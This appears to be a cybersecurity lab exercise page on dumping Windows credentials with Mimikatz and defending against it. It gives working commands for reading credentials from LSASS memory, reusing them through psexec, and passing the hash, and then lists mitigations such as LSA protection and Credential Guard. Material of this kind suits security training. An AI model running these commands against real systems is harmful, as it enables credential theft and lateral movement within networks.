Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 26: Windows Credential Dumping Using Mimikatz

by | May 12, 2025 | 0 comments

Objective: Use Mimikatz to dump credentials from a Windows system to escalate privileges, and learn how to secure systems against credential dumping attacks.

Scenario: Mimikatz is a post-exploitation tool used to extract credentials from memory on Windows systems. If an attacker gains access to a Windows machine, they can use Mimikatz to dump credentials and escalate privileges or move laterally within the network. Your task is to use Mimikatz to perform credential dumping and implement best practices to prevent such attacks.

Lab Setup

  1. Environment:
    • A Windows system with administrative access.
    • Mimikatz executable.
  2. Tools Required:
    • mimikatz.exe.
    • Administrative privileges on the target system.

Lab Steps

Step 1: Download and Run Mimikatz

  1. Download Mimikatz from a trusted source or repository.
  2. Transfer Mimikatz to the target system.
  3. Open a Command Prompt with administrative privileges: Run as Administrator
  4. Navigate to the directory containing mimikatz.exe and launch it: mimikatz.exe

Step 2: Dump User Credentials

  1. Enable the privilege::debug mode: privilege::debug
    • This ensures Mimikatz has the required privileges.
  2. Use the sekurlsa::logonpasswords command to dump credentials from memory: sekurlsa::logonpasswords
    • Example output: Username: Administrator Password: password123 Domain: WORKGROUP
  3. Save the dumped credentials for further use.

Step 3: Authenticate to Other Systems

  1. Use the extracted credentials to authenticate to other systems in the network.
  2. Test the credentials using tools like psexec or net use: psexec \<target_ip> -u Administrator -p password123 cmd

Step 4: Test Pass-the-Hash

  1. Extract NTLM hashes from the credential dump.
  2. Use the sekurlsa::pth command to perform a pass-the-hash attack: sekurlsa::pth /user:Administrator /domain:<domain_name> /ntlm:<hash> /run:cmd.exe
    • Replace <domain_name> and <hash> with the appropriate values.

Solution

Explanation:

  • Mimikatz accesses LSASS memory to extract plaintext passwords, hashes, or Kerberos tickets.
  • Attackers can use this data to escalate privileges or perform lateral movement.

Prevention:

  1. Enable LSA Protection:
    • Prevent processes from accessing LSASS memory: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] "RunAsPPL"=dword:00000001
  2. Enable Credential Guard:
    • Use Windows Defender Credential Guard to protect LSASS memory.
  3. Restrict Privileges:
    • Limit administrative access to critical systems.
  4. Monitor LSASS Access:
    • Use security tools to detect and block unauthorized access to LSASS.
  5. Disable NTLM Authentication:
    • Use Kerberos or certificate-based authentication where possible.
  6. Audit Account Activity:
    • Monitor login attempts and unusual behavior across systems.

Testing and Verification

  1. Attempt to run Mimikatz with LSA protection enabled to ensure it is blocked.
  2. Test Credential Guard by verifying that LSASS memory cannot be accessed.
  3. Confirm that NTLM authentication is disabled by testing legacy logins.

Reflection

This exercise highlights the risks posed by credential dumping using tools like Mimikatz. By identifying vulnerabilities and applying mitigations, you’ve gained valuable insights into securing Windows systems against advanced threats.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *